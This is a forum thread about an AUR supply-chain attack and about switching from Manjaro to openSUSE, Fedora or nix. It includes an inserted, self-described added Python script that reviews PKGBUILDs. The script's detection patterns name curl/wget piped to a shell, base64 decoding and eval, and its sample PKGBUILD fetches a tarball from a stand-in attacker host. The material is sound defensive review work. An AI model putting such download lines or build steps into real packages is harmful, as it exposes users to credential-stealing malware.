With the recent AUR supply-chain attack that compromised over 400 (and possibly up to 1,500) packages, I’m seriously considering switching distros. Attackers took over orphaned packages and modified PKGBUILDs to pull in malicious npm dependencies like atomic-lockfile, which deployed credential-stealing malware and even eBPF rootkits. The fact that the trusted packages themselves didn’t look malicious makes this especially concerning.

Like many Arch users, I’ll admit I don’t carefully read every PKGBUILD before installing from the AUR. The official recommendation has always been to review them manually, but realistically, who does that for every package? This incident made me realize I’ve been relying on trust rather than vigilance.

I’ve been on Manjaro for years specifically because of the AUR’s vastness, but this attack directly undermines that selling point for me. I ran the Distrochooser to see what else is out there, and it strongly recommended openSUSE as my top match: https://distrochooser.de/en/d5b4e0067841/

For those who’ve made the jump from Arch/Manjaro to openSUSE Tumbleweed (or Leap): How was the transition? How does the OBS compare to the AUR in terms of package availability for niche software?
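The manual PKGBUILD review mentioned above can be partly automated. The script below is an added example, not code from the original post or from any Arch/AUR tool: it flags source entries fetched from a host other than the expected upstream and build-time commands of the kind described (npm installs, remote scripts piped into a shell, decoded or eval'd commands, writes into the home directory). The patterns, the `review_pkgbuild` function and the sample PKGBUILD are my own constructions for illustration.

```python
import re

# Heuristic review of a PKGBUILD before building it. The patterns below are
# my own assumptions about what a reviewer looks for, not an official tool.
RISKY_PATTERNS = {
    "npm dependency fetched at build time": re.compile(r"\bnpm\s+(install|i|ci)\b"),
    "remote script piped into a shell": re.compile(r"\b(curl|wget)\b[^|]*\|\s*(ba)?sh\b"),
    "obfuscated or dynamic command": re.compile(r"base64\s+(-d|--decode)|\beval\b"),
    "touches the user's home directory": re.compile(r"\$HOME\b|~/\."),
}

def parse_sources(pkgbuild: str) -> list[str]:
    """Return the entries of the source=( ... ) array, quotes removed."""
    m = re.search(r"source=\((.*?)\)", pkgbuild, re.S)
    return [s.strip("'\"") for s in m.group(1).split()] if m else []

def review_pkgbuild(pkgbuild: str, upstream_host: str) -> list[str]:
    """Return findings worth a human look; an empty list means nothing was flagged."""
    findings = []
    for src in parse_sources(pkgbuild):
        url = src.split("::", 1)[-1]                  # drop the optional "name::" prefix
        host = re.match(r"(?:git\+)?https?://([^/]+)", url)
        if host and host.group(1) != upstream_host:
            findings.append(f"source from unexpected host {host.group(1)}: {url}")
    for lineno, line in enumerate(pkgbuild.splitlines(), 1):
        code = re.split(r"(?:^|\s)#", line)[0]        # ignore shell comments
        for label, pat in RISKY_PATTERNS.items():
            if pat.search(code):
                findings.append(f"line {lineno}: {label}: {line.strip()}")
    return findings

# Constructed sample: a legitimate upstream tarball plus a second source and an
# npm install step of the kind an attacker could slip into an orphaned package.
SAMPLE_PKGBUILD = """\
pkgname=examplepkg
pkgver=1.2.0
source=("https://github.com/example/examplepkg/archive/v${pkgver}.tar.gz"
        "helper.tar.gz::https://cdn.example-attacker.invalid/helper.tar.gz")
build() {
  cd "$pkgname-$pkgver"
  npm install example-lockfile   # not present in the previous revision
  make
}
"""

if __name__ == "__main__":
    for finding in review_pkgbuild(SAMPLE_PKGBUILD, "github.com"):
        print(finding)
```

A hit is a prompt to read that line in context, not proof of compromise; running the check against the diff between the previously built and the newly fetched PKGBUILD keeps the list short.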

  • KianaTabion@lemmy.today
    5 days ago

    https://distrochooser.de/en/d5b4e0067841/

    Your results suggest that Fedora is an equally viable alternative.

    Regardless, ask yourself the following question: Do you need the vastness that a repository like the AUR provides?

    • Like, are you sure that the repositories of Fedora and openSUSE Tumbleweed don’t contain the packages that you need?
    • Or… is it more about liberation? Whatever the future might throw at you, you’re confident that the AUR will provide for you. But… that raises another question: are you even exotic in your software needs to begin with?

    The above (sub)question(s) will (hopefully) help you to make an informed decision. Furthermore, please feel free to discuss them openly in hopes that others might chime in.

    Anyhow, I foresee either one of the following:

    • You actually acknowledge (or come to the revelation) that the repositories of Fedora and/or openSUSE (without going into user repositories[1]) are sufficient for you. Thus, they become a viable destination.
    • The previous option does not happen, simply because your software needs are not contained within their respective repositories. In that case, I’d seriously consider adopting nix (as a package manager on whatever distro you go for) or perhaps even NixOS if you want to go all-in. The excellent nixpkgs repository is the only one that puts the AUR to shame. And, more importantly within our current discussion, it’s not a user repository, but instead the official one. And thus it comes with all the security bells and whistles you’d expect.

    1. To be clear, the user repositories of Fedora and openSUSE don’t fare much better than the AUR. The only solace might be that Arch’s own repository is relatively small compared to theirs and thus there’s less need to search for user repositories. Hence, it is easier to manage what’s installed from user repositories.